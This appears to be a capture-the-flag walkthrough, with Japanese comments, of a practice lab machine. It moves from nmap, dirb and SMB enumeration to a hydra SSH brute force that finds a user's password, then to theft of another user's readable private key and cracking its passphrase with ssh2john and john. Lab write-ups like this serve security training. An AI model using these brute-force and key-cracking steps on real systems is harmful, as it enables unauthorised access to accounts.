btn = document.getElementById("start-machine-button-1")
btn.click()

$ nmap -sV -Pn -oN nmap.txt -v 10.10.201.17

$ cat nmap.txt 
# Nmap 7.95 scan initiated Fri Jul 25 00:04:11 2025 as: /usr/lib/nmap/nmap --privileged -sV -Pn -oN nmap.txt -v 10.10.201.17
Nmap scan report for 10.10.201.17
Host is up (0.39s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 4
445/tcp  open  netbios-ssn Samba smbd 4
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 25 00:05:00 2025 -- 1 IP address (1 host up) scanned in 49.83 seconds

$ dirb http://10.10.201.17 /usr/share/dirb/wordlists/small.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jul 25 00:15:35 2025
URL_BASE: http://10.10.201.17/
WORDLIST_FILES: /usr/share/dirb/wordlists/small.txt

-----------------

GENERATED WORDS: 959                                                           

---- Scanning URL: http://10.10.201.17/ ----
==> DIRECTORY: http://10.10.201.17/development/                                                                                                
                                                                                                                                               
(!) FATAL: Too many errors connecting to host
    (Possible cause: OPERATION TIMEOUT)
                                                                               
-----------------
END_TIME: Fri Jul 25 00:24:48 2025
DOWNLOADED: 403 - FOUND: 0

$ smbclient -L 10.10.203.123
Password for [WORKGROUP\~~~~~~~~~]:

	Sharename       Type      Comment
	---------       ----      -------
	Anonymous       Disk      
	IPC$            IPC       IPC Service (Samba Server 4.15.13-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 10.10.203.123 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

$ smbclient \\\\10.10.203.123\\Anonymous
Password for [WORKGROUP\~~~~~~~~]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Apr 20 02:31:20 2018
  ..                                  D        0  Fri Apr 20 02:13:06 2018
  staff.txt                           N      173  Fri Apr 20 02:29:55 2018

		14282840 blocks of size 1024. 6248192 blocks available
smb: \> get staff.txt 
getting file \staff.txt of size 173 as staff.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit

$ ls
nmap.txt  staff.txt

$ cat staff.txt 
Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)

-Kay

$ hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.138.120 -t 4
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-29 22:16:21
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.138.120:22/
[STATUS] 48.00 tries/min, 48 tries in 00:01h, 14344351 to do in 4980:41h, 4 active
[STATUS] 51.00 tries/min, 153 tries in 00:03h, 14344246 to do in 4687:40h, 4 active
[STATUS] 49.57 tries/min, 347 tries in 00:07h, 14344052 to do in 4822:42h, 4 active
[STATUS] 50.80 tries/min, 762 tries in 00:15h, 14343637 to do in 4705:56h, 4 active
[22][ssh] host: 10.10.138.120   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-07-29 22:31:49

$ ssh jan@10.10.138.120
The authenticity of host '10.10.138.120 (10.10.138.120)' can't be established.
ED25519 key fingerprint is SHA256:+CWwhGUluZFGjcxouDqD2X6tBduKYivX449ysO0khvo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.138.120' (ED25519) to the list of known hosts.
jan@10.10.138.120's password:

Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@ip-10-10-138-120:~$

jan@ip-10-10-138-120:~$ ls -al /home/kay/.ssh/
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23  2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23  2018 ..
-rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 id_rsa
-rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub

# ssh2john.py
# johnが理解できるハッシュ形式に変換
python3 /usr/share/john/ssh2john.py kay_id_rsa > hash.txt

# 変換したハッシュを対象にパスワードリストで解析
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxxxx          (kay_id_rsa)     
1g 0:00:00:00 DONE (2025-07-29 23:25) 3.846g/s 318276p/s 318276c/s 318276C/s bird..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

# kayでsshログイン
$ ssh -i kay_id_rsa kay@10.10.138.120

$ cat pass.bak 
{{最終的なパスワード}}